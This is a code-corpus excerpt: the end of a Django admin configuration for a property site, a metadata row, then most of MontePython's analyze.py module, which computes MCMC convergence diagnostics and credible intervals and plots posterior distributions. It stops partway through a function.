'fields': ['address_1', 'address_2', 'address_3', 'town_city', 'county', 'postcode'],
}),
(_('Geographic'), {
'fields': ['location']
}),
(_('Contact'), {
'fields': ['telephone', 'email']
}),
(_('Details'), {
'fields': ['details', 'opening_hours']
})
)
formfield_overrides = {
models.PointField: {"widget": GooglePointFieldWidget}
}
class Media:
css = {
'all':['build/css/admin/override/map.min.css']
}
class PropertyTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class MediaTypeAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class PropertyTenureAdmin(admin.ModelAdmin):
fields = ('name', 'slug', 'status')
class BlockAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',), }
list_display = ('name', 'slug')
fields = ('name','slug','content','status')
class BannerAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('title',), }
list_display = ('title', 'slug', 'action', 'label')
fields = ('title', 'subtitle', 'action', 'label', 'slug', 'attachment', 'status')
class SEOAdmin(admin.ModelAdmin):
list_display = ('url', 'title')
admin.site.register(SearchPrice, SearchPriceAdmin)
admin.site.register(Branch, BranchAdmin)
admin.site.register(Banner, BannerAdmin)
admin.site.register(PropertyType, PropertyTypeAdmin)
admin.site.register(PropertyTenure, PropertyTenureAdmin)
admin.site.register(MediaType, MediaTypeAdmin)
admin.site.register(Block, BlockAdmin)
admin.site.register(SEO, SEOAdmin)
admin.site.register(Alert)
|
mit
| 5,921,387,022,681,501,000 | 28.115385 | 112 | 0.630559 | false | 3.710784 | false | false | false |
miguelzuma/montepython_zuma
|
montepython/analyze.py
|
1
|
95056
|
"""
.. module:: analyze
:synopsis: Extract data from chains and produce plots
.. moduleauthor:: Karim Benabed <[email protected]>
.. moduleauthor:: Benjamin Audren <[email protected]>
Collection of functions needed to analyze the Markov chains.
This module defines as well a class :class:`Information`, that stores useful
quantities, and shortens the argument passing between the functions.
.. note::
Some of the methods used in this module are directly adapted from the
`CosmoPmc <http://www.cosmopmc.info>`_ code from Kilbinger et. al.
"""
import os
import math
import numpy as np
from itertools import count
# The root plotting module, to change options like font sizes, etc...
import matplotlib
# The following line suppresses the need for an X server
matplotlib.use("Agg")
# Module for handling display
import matplotlib.pyplot as plt
# Module to handle warnings from matplotlib
import warnings
import importlib
import io_mp
from itertools import ifilterfalse
from itertools import ifilter
import scipy.ndimage
# Defined to remove the burnin for all the points that were produced before the
# first time where -log-likelihood <= min-minus-log-likelihood+LOG_LKL_CUTOFF
LOG_LKL_CUTOFF = 3
NUM_COLORS = 6
def analyze(command_line):
"""
Main function, does the entire analysis.
It calls in turn all the other routines from this module. To limit the
arguments of each function to a reasonnable size, a :class:`Information`
instance is used. This instance is initialized in this function, then
appended by the other routines.
"""
# Check if the scipy module has the interpolate method correctly
# installed (should be the case on every linux distribution with
# standard numpy)
try:
from scipy.interpolate import interp1d
Information.has_interpolate_module = True
except ImportError:
Information.has_interpolate_module = False
warnings.warn(
'No cubic interpolation done (no interpolate method found ' +
'in scipy), only linear')
# Determine how many different folders are asked through the 'info'
# command, and create as many Information instances
files = separate_files(command_line.files)
# Create an instance of the Information class for each subgroup found in
# the previous function. They will each hold all relevant information, and
# be used as a compact way of exchanging information between functions
information_instances = []
for item in files:
info = Information(command_line)
information_instances.append(info)
# Prepare the files, according to the case, load the log.param, and
# prepare the output (plots folder, .covmat, .info and .log files).
# After this step, info.files will contain all chains.
status = prepare(item, info)
# If the preparation step generated new files (for instance,
# translating from NS or CH to Markov Chains) this routine should stop
# now.
if not status:
return
# Compute the mean, maximum of likelihood, 1-sigma variance for this
# main folder. This will create the info.chain object, which contains
# all the points computed stacked in one big array.
convergence(info)
# check if analyze() is called directly by the user, or by the mcmc loop during an updating phase
try:
# command_line.update is defined when called by the mcmc loop
command_line.update
except:
# in case it was not defined (i.e. when analyze() is called directly by user), set it to False
command_line.update = 0
# compute covariance matrix, excepted when we are in update mode and convergence is too bad or too good
if command_line.update and (np.amax(info.R) > 3. or np.amax(info.R) < 0.4):
print '--> Not computing covariance matrix'
else:
try:
if command_line.want_covmat:
print '--> Computing covariance matrix'
info.covar = compute_covariance_matrix(info)
# Writing it out in name_of_folder.covmat
io_mp.write_covariance_matrix(
info.covar, info.backup_names, info.cov_path)
except:
print '--> Computing covariance matrix failed'
pass
# Store an array, sorted_indices, containing the list of indices
# corresponding to the line with the highest likelihood as the first
# element, and then as decreasing likelihood
info.sorted_indices = info.chain[:, 1].argsort(0)
# Writing the best-fit model in name_of_folder.bestfit
bestfit_line = [elem*info.scales[i, i] for i, elem in
enumerate(info.chain[info.sorted_indices[0], 2:])]
io_mp.write_bestfit_file(bestfit_line, info.backup_names,
info.best_fit_path)
if not command_line.minimal:
# Computing 1,2 and 3-sigma errors, and plot. This will create the
# triangle and 1d plot by default.
compute_posterior(information_instances)
print '--> Writing .info and .tex files'
for info in information_instances:
info.write_information_files()
# when called by MCMC in update mode, return R values so that they can be written for information in the chains
if command_line.update:
return info.R
def prepare(files, info):
"""
Scan the whole input folder, and include all chains in it.
Since you can decide to analyze some file(s), or a complete folder, this
function first needs to separate between the two cases.
.. warning::
If someday you change the way the chains are named, remember to change
here too, because this routine assumes the chains have a double
underscore in their names.
.. note::
Only files ending with .txt will be selected, to keep compatibility
with CosmoMC format
.. note::
New in version 2.0.0: if you ask to analyze a Nested Sampling
sub-folder (i.e. something that ends in `NS` with capital letters), the
analyze module will translate the output from Nested Sampling to
standard chains for Monte Python, and stops. You can then run the
`-- info` flag on the whole folder. **This procedure is not necessary
if the run was complete, but only if the Nested Sampling run was killed
before completion**.
Parameters
----------
files : list
list of potentially only one element, containing the files to analyze.
This can be only one file, or the encompassing folder, files
info : Information instance
Used to store the result
"""
# First test if the folder is a Nested Sampling or CosmoHammer folder. If
# so, call the module's own routine through the clean conversion function,
# which will translate the output of this other sampling into MCMC chains
# that can then be analyzed.
modules = ['nested_sampling', 'cosmo_hammer']
tags = ['NS', 'CH']
for module_name, tag in zip(modules, tags):
action_done = clean_conversion(module_name, tag, files[0])
if action_done:
return False
# If the input command was an entire folder, then grab everything in it.
# Too small files (below 600 octets) and subfolders are automatically
# removed.
folder, files, basename = recover_folder_and_files(files)
info.files = files
info.folder = folder
info.basename = basename
# Check if the log.param file exists
parameter_file_path = os.path.join(folder, 'log.param')
if os.path.isfile(parameter_file_path):
if os.path.getsize(parameter_file_path) == 0:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"seems empty")
else:
raise io_mp.AnalyzeError(
"The log param file %s " % os.path.join(folder, 'log.param') +
"is missing in the analyzed folder?")
# If the folder has no subdirectory, then go for a simple infoname,
# otherwise, call it with the last name
basename = (os.path.basename(folder) if os.path.basename(folder) != '.'
else os.path.basename(os.path.abspath(
os.path.join(folder, '..'))))
info.v_info_path = os.path.join(folder, basename+'.v_info')
info.h_info_path = os.path.join(folder, basename+'.h_info')
info.tex_path = os.path.join(folder, basename+'.tex')
info.cov_path = os.path.join(folder, basename+'.covmat')
info.log_path = os.path.join(folder, basename+'.log')
info.best_fit_path = os.path.join(folder, basename+'.bestfit')
info.param_path = parameter_file_path
return True
def convergence(info):
"""
Compute convergence for the desired chains, using Gelman-Rubin diagnostic
Chains have been stored in the info instance of :class:`Information`. Note
that the G-R diagnostic can be computed for a single chain, albeit it will
most probably give absurd results. To do so, it separates the chain into
three subchains.
"""
# Recovering parameter names and scales, creating tex names,
extract_parameter_names(info)
# Now that the number of parameters is known, the array containing bounds
# can be initialised
info.bounds = np.zeros((len(info.ref_names), len(info.levels), 2))
# Circle through all files to find the global maximum of likelihood
#print '--> Finding global maximum of likelihood'
find_maximum_of_likelihood(info)
# Restarting the circling through files, this time removing the burnin,
# given the maximum of likelihood previously found and the global variable
# LOG_LKL_CUTOFF. spam now contains all the accepted points that were
# explored once the chain moved within min_minus_lkl - LOG_LKL_CUTOFF.
# If the user asks for a keep_fraction <1, this is also the place where
# a fraction (1-keep_fraction) is removed at the beginning of each chain.
#print '--> Removing burn-in'
spam = remove_bad_points(info)
info.remap_parameters(spam)
# Now that the list spam contains all the different chains removed of
# their respective burn-in, proceed to the convergence computation
# 2D arrays for mean and var, one column will contain the total (over
# all chains) mean (resp. variance), and each other column the
# respective chain mean (resp. chain variance). R only contains the
# values for each parameter. Therefore, mean and var will have len(spam)+1
# as a first dimension
mean = np.zeros((len(spam)+1, info.number_parameters))
var = np.zeros((len(spam)+1, info.number_parameters))
R = np.zeros(info.number_parameters)
# Store the total number of points, and the total in each chain
total = np.zeros(len(spam)+1)
for j in xrange(len(spam)):
total[j+1] = spam[j][:, 0].sum()
total[0] = total[1:].sum()
# Compute mean and variance for each chain
print '--> Computing mean values'
compute_mean(mean, spam, total)
print '--> Computing variance'
compute_variance(var, mean, spam, total)
print '--> Computing convergence criterium (Gelman-Rubin)'
# Gelman Rubin Diagnostic:
# Computes a quantity linked to the ratio of the mean of the variances of
# the different chains (within), and the variance of the means (between)
# Note: This is not strictly speaking the Gelman Rubin test, defined for
# same-length MC chains. Our quantity is defined without the square root,
# which should not change much the result: a small sqrt(R) will still be a
# small R. The same convention is used in CosmoMC, except for the weighted
# average: we decided to do the average taking into account that longer
# chains should count more
within = 0
between = 0
for i in xrange(np.shape(mean)[1]):
for j in xrange(len(spam)):
within += total[j+1]*var[j+1, i]
between += total[j+1]*(mean[j+1, i]-mean[0, i])**2
within /= total[0]
between /= (total[0]-1)
R[i] = between/within
if i == 0:
print ' -> R-1 is %.6f' % R[i], '\tfor ', info.ref_names[i]
else:
print ' %.6f' % R[i], '\tfor ', info.ref_names[i]
# Log finally the total number of steps, and absolute loglikelihood
with open(info.log_path, 'a') as log:
log.write("--> Total number of steps: %d\n" % (
info.steps))
log.write("--> Total number of accepted steps: %d\n" % (
info.accepted_steps))
log.write("--> Minimum of -logLike : %.2f" % (
info.min_minus_lkl))
# Store the remaining members in the info instance, for further writing to
# files, storing only the mean and total of all the chains taken together
info.mean = mean[0]
info.R = R
info.total = total[0]
# Create the main chain, which consists in all elements of spam
# put together. This will serve for the plotting.
info.chain = np.vstack(spam)
def compute_posterior(information_instances):
"""
computes the marginalized posterior distributions, and optionnally plots
them
Parameters
----------
information_instances : list
list of information objects, initialised on the given folders, or list
of file, in input. For each of these instance, plot the 1d and 2d
posterior distribution, depending on the flags stored in the instances,
comming from command line arguments or read from a file.
"""
# For convenience, store as `conf` the first element of the list
# information_instances, since it will be called often to check for
# configuration parameters
conf = information_instances[0]
# Pre configuration of the output, note that changes to the font size
# will occur later on as well, to obtain a nice scaling.
matplotlib.rc('text', usetex=True)
matplotlib.rc('font', size=11)
matplotlib.rc('xtick', labelsize='8')
matplotlib.rc('ytick', labelsize='8')
# Recover max and min values for each instance, defining the a priori place
# of ticks (in case of a comparison, this should change)
for info in information_instances:
info.define_ticks()
# If plots/ folder in output folder does not exist, create it
if os.path.isdir(os.path.join(info.folder, 'plots')) is False:
os.mkdir(os.path.join(info.folder, 'plots'))
# Determine the total number of parameters to plot, based on the list
# without duplicates of the plotted parameters of all information instances
plotted_parameters = []
# For printing not in latex
ref_names = []
for info in information_instances:
for index, name in enumerate(info.plotted_parameters):
if name not in plotted_parameters:
plotted_parameters.append(name)
ref_names.append(info.ref_names[index])
if len(plotted_parameters) == 0:
raise io_mp.AnalyzeError(
"You provided no parameters to analyze, probably by selecting"
" wrong parameters names in the '--extra' file.")
# Find the appropriate number of columns and lines for the 1d posterior
# plot
if conf.num_columns_1d == None:
num_columns = int(round(math.sqrt(len(plotted_parameters))))
else:
num_columns = conf.num_columns_1d
num_lines = int(math.ceil(len(plotted_parameters)*1.0/num_columns))
# For special needs, you can impose here a different number of columns and lines in the 1d plot
# Here is a commented example:
# if (len(plotted_parameters) == 10):
# num_columns = 5
# num_lines = 2
# Create the figures
# which will be 3*3 inches per subplot, quickly growing!
if conf.plot:
fig1d = plt.figure(num=1, figsize=(
3*num_columns,
3*num_lines), dpi=80)
if conf.plot_2d:
fig2d = plt.figure(num=2, figsize=(
3*len(plotted_parameters),
3*len(plotted_parameters)), dpi=80)
# Create the name of the files, concatenating the basenames with
# underscores.
file_name = "_".join(
[info.basename for info in information_instances])
# Loop over all the plotted parameters
# There will be two indices at all time, the one running over the plotted
# parameters, `index`, and the one corresponding to the actual column in
# the actual file, `native_index`. For instance, if you try to plot only
# two columns of a several columns file, index will vary from 0 to 1, but
# the corresponding native indices might be anything.
# Obviously, since plotted parameters contain potentially names not
# contained in some files (in case of a comparison), native index might be
# undefined.
# Defined the legends object, which will store the plot style, to display
# at the level of the figure
legends = [None for _ in range(len(information_instances))]
if not conf.legendnames:
legend_names = [info.basename.replace('_', ' ')
for info in information_instances]
else:
legend_names = conf.legendnames
print '-----------------------------------------------'
for index, name in enumerate(plotted_parameters):
# Adding the subplots to the respective figures, this will correspond
# to the diagonal on the triangle plot.
if conf.plot_2d:
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
index*(len(plotted_parameters)+1)+1,
yticks=[])
if conf.plot:
ax1d = fig1d.add_subplot(
num_lines, num_columns, index+1, yticks=[])
# check for each instance if the name is part of the list of plotted
# parameters, and if yes, store the native_index. If not, store a flag
# to ignore any further plotting or computing issues concerning this
# particular instance.
for info in information_instances:
try:
info.native_index = info.ref_names.index(name)
info.ignore_param = False
standard_name = info.backup_names[info.native_index]
except ValueError:
info.ignore_param = True
# The limits might have been enforced by the user
if name in conf.force_limits.iterkeys():
x_span = conf.force_limits[name][1]-conf.force_limits[name][0]
tick_min = conf.force_limits[name][0] +0.1*x_span
tick_max = conf.force_limits[name][1] -0.1*x_span
ticks = np.linspace(tick_min,
tick_max,
info.ticknumber)
for info in information_instances:
if not info.ignore_param:
info.x_range[info.native_index] = conf.force_limits[name]
info.ticks[info.native_index] = ticks
# otherwise, find them automatically
else:
adjust_ticks(name, information_instances)
print ' -> Computing histograms for ', name
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (first step)
#
# simply the histogram from the chains, with few bins
#
info.hist, info.bin_edges = np.histogram(
info.chain[:, info.native_index+2], bins=info.bins,
weights=info.chain[:, 0], normed=False, density=False)
info.hist = info.hist/info.hist.max()
info.bincenters = 0.5*(info.bin_edges[1:]+info.bin_edges[:-1])
# 1D posterior normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
info.interp_hist, info.interp_grid = cubic_interpolation(
info, info.hist, info.bincenters)
# minimum credible interval (method by Jan Haman). Fails for
# multimodal histograms
bounds = minimum_credible_intervals(info)
info.bounds[info.native_index] = bounds
# plotting
for info in information_instances:
if not info.ignore_param:
# 1D posterior normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# factor by which the grid has been made thinner (10 means 10 times more bins)
interpolation_factor = float(len(info.interp_grid))/float(len(info.bincenters))
# factor for gaussian smoothing
sigma = interpolation_factor*info.gaussian_smoothing
# smooth
smoothed_interp_hist = scipy.ndimage.filters.gaussian_filter(info.interp_hist,sigma)
# re-normalised
smoothed_interp_hist = smoothed_interp_hist/smoothed_interp_hist.max()
if conf.plot_2d:
##################################################
# plot 1D posterior in diagonal of triangle plot #
##################################################
plot = ax2d.plot(
info.interp_grid,
smoothed_interp_hist,
linewidth=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
legends[info.id] = plot[0]
ax2d.set_xticks(info.ticks[info.native_index])
if conf.legend_style == 'top':
ax2d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
elif conf.legend_style == 'sides':
# Except for the last 1d plot (bottom line), don't
# print ticks
if index == len(plotted_parameters)-1:
ax2d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax2d.tick_params('x',direction='inout')
ax2d.set_xlabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
else:
ax2d.set_xticklabels([])
ax2d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
if conf.plot:
if conf.short_title_1d:
ax1d.set_title(
'%s'.format(info.decimal) % (
info.tex_names[info.native_index]),
fontsize=info.fontsize)
else:
# Note the use of double curly brackets {{ }} to produce
# the desired LaTeX output. This is necessary because the
# format function would otherwise understand single
# brackets as fields.
ax1d.set_title(
'%s=$%.{0}g^{{+%.{0}g}}_{{%.{0}g}}$'.format(
info.decimal) % (
info.tex_names[info.native_index],
info.mean[info.native_index],
info.bounds[info.native_index, 0, -1],
info.bounds[info.native_index, 0, 0]),
fontsize=info.fontsize)
ax1d.set_xticks(info.ticks[info.native_index])
ax1d.set_xticklabels(
['%.{0}g'.format(info.decimal) % s
for s in info.ticks[info.native_index]],
fontsize=info.ticksize)
ax1d.axis([info.x_range[info.native_index][0],
info.x_range[info.native_index][1],
0, 1.05])
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
##################################################
# plot 1D posterior in 1D plot #
##################################################
ax1d.plot(
info.interp_grid,
# gaussian filtered 1d posterior:
smoothed_interp_hist,
# raw 1d posterior:
#info.interp_hist,
lw=info.line_width, ls='-',
color = info.MP_color_cycle[info.id][1],
# the [1] picks up the color of the 68% contours
# with [0] you would get that of the 95% contours
alpha = info.alphas[info.id])
# uncomment if you want to see the raw points from the histogram
# (to check whether the inteprolation and smoothing generated artefacts)
#ax1d.plot(
# info.bincenters,
# info.hist,
# 'ro')
if conf.mean_likelihood:
for info in information_instances:
if not info.ignore_param:
try:
# 1D mean likelihood normalised to P_max=1 (first step)
#
# simply the histogram from the chains, weighted by mutiplicity*likelihood
#
lkl_mean, _ = np.histogram(
info.chain[:, info.native_index+2],
bins=info.bin_edges,
normed=False,
weights=np.exp(
conf.min_minus_lkl-info.chain[:, 1])*info.chain[:, 0])
lkl_mean /= lkl_mean.max()
# 1D mean likelihood normalised to P_max=1 (second step)
#
# returns a histogram still normalised to one, but with a ten times finer sampling;
# >> first, tries a method with spline interpolation between bin centers and extrapolation at the edges
# >> if it fails, a simpler and more robust method of linear interpolation between bin centers is used
# >> if the interpolation module is not installed, this step keeps the same posterior
#
interp_lkl_mean, interp_grid = cubic_interpolation(
info, lkl_mean, info.bincenters)
# 1D mean likelihood normalised to P_max=1 (third step, used only for plotting)
#
# apply gaussian smoothing
#
# smooth
smoothed_interp_lkl_mean = scipy.ndimage.filters.gaussian_filter(interp_lkl_mean,sigma)
# re-normalised
smoothed_interp_lkl_mean = smoothed_interp_lkl_mean/smoothed_interp_lkl_mean.max()
# Execute some customisation scripts for the 1d plots
if (info.custom1d != []):
for elem in info.custom1d:
execfile('plot_files/'+elem)
########################################################
# plot 1D mean likelihood in diagonal of triangle plot #
########################################################
if conf.plot_2d:
# raw mean likelihoods:
#ax2d.plot(info.bincenter, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax2d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
########################################################
# plot 1D mean likelihood in 1D plot #
########################################################
if conf.plot:
# raw mean likelihoods:
#ax1d.plot(info.bincenters, lkl_mean,
# ls='--', lw=conf.line_width,
# color = info.MP_color_cycle[info.id][1],
# alpha = info.alphas[info.id])
# smoothed and interpolated mean likelihoods:
ax1d.plot(interp_grid, smoothed_interp_lkl_mean,
ls='--', lw=conf.line_width,
color = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id])
except:
print 'could not find likelihood contour for ',
print info.ref_parameters[info.native_index]
if conf.subplot is True:
if conf.plot_2d:
extent2d = ax2d.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
fig2d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent2d.expanded(1.1, 1.4))
if conf.plot:
extent1d = ax1d.get_window_extent().transformed(
fig1d.dpi_scale_trans.inverted())
fig1d.savefig(os.path.join(
conf.folder, 'plots', file_name+'.'+conf.extension),
bbox_inches=extent1d.expanded(1.1, 1.4))
# Store the function in a file
for info in information_instances:
if not info.ignore_param:
hist_file_name = os.path.join(
info.folder, 'plots',
info.basename+'_%s.hist' % (
standard_name))
write_histogram(hist_file_name,
info.interp_grid, info.interp_hist)
# Now do the rest of the triangle plot
if conf.plot_2d:
for second_index in xrange(index):
second_name = plotted_parameters[second_index]
for info in information_instances:
if not info.ignore_param:
try:
info.native_second_index = info.ref_names.index(
plotted_parameters[second_index])
info.has_second_param = True
second_standard_name = info.backup_names[
info.native_second_index]
except ValueError:
info.has_second_param = False
else:
info.has_second_param = False
ax2dsub = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
(index)*len(plotted_parameters)+second_index+1)
for info in information_instances:
if info.has_second_param:
ax2dsub.axis([info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]])
# 2D likelihood (first step)
#
# simply the histogram from the chains, with few bins only
#
info.n, info.xedges, info.yedges = np.histogram2d(
info.chain[:, info.native_index+2],
info.chain[:, info.native_second_index+2],
weights=info.chain[:, 0],
bins=(info.bins, info.bins),
normed=False)
info.extent = [
info.x_range[info.native_second_index][0],
info.x_range[info.native_second_index][1],
info.x_range[info.native_index][0],
info.x_range[info.native_index][1]]
info.x_centers = 0.5*(info.xedges[1:]+info.xedges[:-1])
info.y_centers = 0.5*(info.yedges[1:]+info.yedges[:-1])
# 2D likelihood (second step)
#
# like for 1D, interpolate to get a finer grid
# TODO: we should not only interpolate between bin centers, but also extrapolate between side bin centers and bin edges
#
interp_y_centers = scipy.ndimage.zoom(info.y_centers,info.interpolation_smoothing, mode='reflect')
interp_x_centers = scipy.ndimage.zoom(info.x_centers,info.interpolation_smoothing, mode='reflect')
interp_likelihood = scipy.ndimage.zoom(info.n,info.interpolation_smoothing, mode='reflect')
# 2D likelihood (third step)
#
# gaussian smoothing
#
sigma = info.interpolation_smoothing*info.gaussian_smoothing
interp_smoothed_likelihood = scipy.ndimage.filters.gaussian_filter(interp_likelihood,[sigma,sigma], mode='reflect')
# Execute some customisation scripts for the 2d contour plots
if (info.custom2d != []):
for elem in info.custom2d:
execfile('plot_files/'+elem)
# plotting contours, using the ctr_level method (from Karim
# Benabed). Note that only the 1 and 2 sigma contours are
# displayed (due to the line with info.levels[:2])
try:
###########################
# plot 2D filled contours #
###########################
if not info.contours_only:
contours = ax2dsub.contourf(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha=info.alphas[info.id])
# now add a thin darker line
# around the 95% contour
ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent,
levels=ctr_level(
interp_smoothed_likelihood,
info.levels[1:2]),
zorder=4,
colors = info.MP_color_cycle[info.id][1],
alpha = info.alphas[info.id],
linewidths=1)
###########################
# plot 2D contours #
###########################
if info.contours_only:
contours = ax2dsub.contour(
interp_y_centers,
interp_x_centers,
interp_smoothed_likelihood,
extent=info.extent, levels=ctr_level(
interp_smoothed_likelihood,
info.levels[:2]),
zorder=4,
colors = info.MP_color_cycle[info.id],
alpha = info.alphas[info.id],
linewidths=info.line_width)
except Warning:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
except ValueError as e:
if str(e) == "Contour levels must be increasing":
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot. \n " % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]) +
'The error is: "Contour levels must be increasing"' +
" but " + str(ctr_level(info.n, info.levels[:2])) +
" were found. This may happen when most" +
" points fall in the same bin.")
else:
warnings.warn(
"The routine could not find the contour of the " +
"'%s-%s' 2d-plot" % (
info.plotted_parameters[info.native_index],
info.plotted_parameters[info.native_second_index]))
ax2dsub.set_xticks(info.ticks[info.native_second_index])
ax2dsub.set_yticks(info.ticks[info.native_index])
ax2dsub.tick_params('both',direction='inout',top=True,bottom=True,left=True,right=True)
if index == len(plotted_parameters)-1:
ax2dsub.set_xticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_second_index]],
fontsize=info.ticksize)
if conf.legend_style == 'sides':
ax2dsub.set_xlabel(
info.tex_names[info.native_second_index],
fontsize=info.fontsize)
else:
ax2dsub.set_xticklabels([''])
ax2dsub.set_yticks(info.ticks[info.native_index])
if second_index == 0:
ax2dsub.set_yticklabels(
['%.{0}g'.format(info.decimal) % s for s in
info.ticks[info.native_index]],
fontsize=info.ticksize)
else:
ax2dsub.set_yticklabels([''])
if conf.legend_style == 'sides':
if second_index == 0:
ax2dsub.set_ylabel(
info.tex_names[info.native_index],
fontsize=info.fontsize)
if conf.subplot is True:
# Store the individual 2d plots.
if conf.plot_2d:
area = ax2dsub.get_window_extent().transformed(
fig2d.dpi_scale_trans.inverted())
# Pad the saved area by 10% in the x-direction and 20% in
# the y-direction
fig2d.savefig(os.path.join(
conf.folder, 'plots',
file_name+'_2d_%s-%s.%s' % (
standard_name, second_standard_name,
conf.extension)),
bbox_inches=area.expanded(1.4, 1.4))
# store the coordinates of the points for further
# plotting.
store_contour_coordinates(
conf, standard_name, second_standard_name, contours)
for info in information_instances:
if not info.ignore_param and info.has_second_param:
info.hist_file_name = os.path.join(
info.folder, 'plots',
'{0}_2d_{1}-{2}.hist'.format(
info.basename,
standard_name,
second_standard_name))
write_histogram_2d(
info.hist_file_name, info.x_centers, info.y_centers,
info.extent, info.n)
print '-----------------------------------------------'
if conf.plot:
print '--> Saving figures to .{0} files'.format(info.extension)
plot_name = '-vs-'.join([os.path.split(elem.folder)[-1]
for elem in information_instances])
if conf.plot_2d:
# Legend of triangle plot
if ((conf.plot_legend_2d == None) and (len(legends) > 1)) or (conf.plot_legend_2d == True):
# Create a virtual subplot in the top right corner,
# just to be able to anchor the legend nicely
ax2d = fig2d.add_subplot(
len(plotted_parameters),
len(plotted_parameters),
len(plotted_parameters),
)
ax2d.axis('off')
try:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
fontsize=info.legendsize)
except TypeError:
ax2d.legend(legends, legend_names,
loc='upper right',
borderaxespad=0.,
prop={'fontsize': info.legendsize})
fig2d.subplots_adjust(wspace=0, hspace=0)
fig2d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_triangle.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
# Legend of 1D plot
if conf.plot:
if ((conf.plot_legend_1d == None) and (len(legends) > 1)) or (conf.plot_legend_1d == True):
# no space left: add legend to thr right
if len(plotted_parameters)<num_columns*num_lines:
fig1d.legend(legends, legend_names,
loc= ((num_columns-0.9)/num_columns,0.1/num_columns),
fontsize=info.legendsize)
# space left in lower right part: add legend there
else:
fig1d.legend(legends, legend_names,
loc= 'center right',
bbox_to_anchor = (1.2,0.5),
fontsize=info.legendsize)
fig1d.tight_layout()
fig1d.savefig(
os.path.join(
conf.folder, 'plots', '{0}_1d.{1}'.format(
plot_name, info.extension)),
bbox_inches='tight')
def ctr_level(histogram2d, lvl, infinite=False):
"""
Extract the contours for the 2d plots (Karim Benabed)
"""
hist = histogram2d.flatten()*1.
hist.sort()
cum_hist = np.cumsum(hist[::-1])
cum_hist /= cum_hist[-1]
alvl = np.searchsorted(cum_hist, lvl)[::-1]
clist = [0]+[hist[-i] for i in alvl]+[hist.max()]
if not infinite:
return clist[1:]
return clist
def minimum_credible_intervals(info):
"""
Extract minimum credible intervals (method from Jan Haman) FIXME
"""
histogram = info.hist
bincenters = info.bincenters
levels = info.levels
bounds = np.zeros((len(levels), 2))
j = 0
delta = bincenters[1]-bincenters[0]
left_edge = max(histogram[0] - 0.5*(histogram[1]-histogram[0]), 0.)
right_edge = max(histogram[-1] + 0.5*(histogram[-1]-histogram[-2]), 0.)
failed = False
for level in levels:
norm = float(
(np.sum(histogram)-0.5*(histogram[0]+histogram[-1]))*delta)
norm += 0.25*(left_edge+histogram[0])*delta
norm += 0.25*(right_edge+histogram[-1])*delta
water_level_up = np.max(histogram)*1.0
water_level_down = np.min(histogram)*1.0
top = 0.
iterations = 0
while (abs((top/norm)-level) > 0.0001) and not failed:
top = 0.
water_level = (water_level_up + water_level_down)/2.
#ontop = [elem for elem in histogram if elem > water_level]
indices = [i for i in range(len(histogram))
if histogram[i] > water_level]
# check for multimodal posteriors
if ((indices[-1]-indices[0]+1) != len(indices)):
warnings.warn(
"could not derive minimum credible intervals " +
"for this multimodal posterior")
warnings.warn(
"please try running longer chains or reducing " +
"the number of bins with --bins BINS (default: 20)")
failed = True
break
top = (np.sum(histogram[indices]) -
0.5*(histogram[indices[0]]+histogram[indices[-1]]))*(delta)
# left
if indices[0] > 0:
top += (0.5*(water_level+histogram[indices[0]]) *
delta*(histogram[indices[0]]-water_level) /
(histogram[indices[0]]-histogram[indices[0]-1]))
else:
if (left_edge > water_level):
top += 0.25*(left_edge+histogram[indices[0]])*delta
else:
